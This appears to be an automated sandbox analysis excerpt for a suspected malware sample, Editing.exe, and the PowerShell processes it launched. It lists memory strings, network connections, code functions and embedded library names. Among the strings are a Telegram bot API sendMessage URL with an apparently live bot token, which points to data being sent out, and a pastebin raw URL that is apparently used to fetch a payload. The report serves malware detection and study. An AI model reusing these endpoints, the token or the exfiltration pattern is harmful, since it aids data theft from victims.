Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0252000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2184575792.000002B10B428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.2404365752.000001E2F6E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coW
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCC93000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFD6000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCC93000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCC93000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: Editing.exe, 00000000.00000002.3212619407.00000284CCC93000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/download
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/info
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000002.00000002.2184575792.000002B10B201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2191077266.0000020A62521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2300636832.000001E280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: Editing.exe, 00000000.00000002.3212913296.00000284CCFD6000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3211502508.000002443A8A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002
Source: powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0252000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214912074.00000284CFF61000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213935450.00000284CFAE0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3215091691.00000284D0130000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0252000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000004.00000002.2191077266.0000020A63153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2224756243.000002B11B271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2269834300.0000020A726D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2191077266.0000020A63153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.2188700328.0000020A608D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/WHKzW2nr
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51668
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51882
Source: unknownNetwork traffic detected: HTTP traffic on port 51881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 51668 -> 443
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51668 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343BEB7D NtWriteVirtualMemory,4_2_00007FFD343BEB7D
Source: C:\Users\user\Desktop\ Editing.exeCode function: 0_2_00007FF5E721306F0_2_00007FF5E721306F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B70FB4_2_00007FFD343B70FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343BBC714_2_00007FFD343BBC71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B59D04_2_00007FFD343B59D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B5E514_2_00007FFD343B5E51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B85FA4_2_00007FFD343B85FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B4B524_2_00007FFD343B4B52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B7AFC4_2_00007FFD343B7AFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B86FA4_2_00007FFD343B86FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B4BD34_2_00007FFD343B4BD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B6FD34_2_00007FFD343B6FD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B27654_2_00007FFD343B2765
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343BDB6D4_2_00007FFD343BDB6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B84454_2_00007FFD343B8445
Source: Editing.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: Editing.exeBinary or memory string: OriginalFilename vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216610266.00000284D1481000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214912074.00000284CFF61000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213935450.00000284CFAE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215091691.00000284D0130000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212109314.00000284CC9A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212130123.00000284CC9B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3211198846.0000024437CF2000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWorkTeam.dll2 vs Editing.exe
Source: Editing.exe, 00000000.00000002.3211317727.0000024437D40000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214493572.00000284CFE00000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215920817.00000284D08B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3211294592.0000024437D31000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213770399.00000284CF971000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3236670998.00007FF647018000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3236670998.00007FF647018000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWorkTeam.dll2 vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3210892163.00000244364D1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Management.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Editing.exe
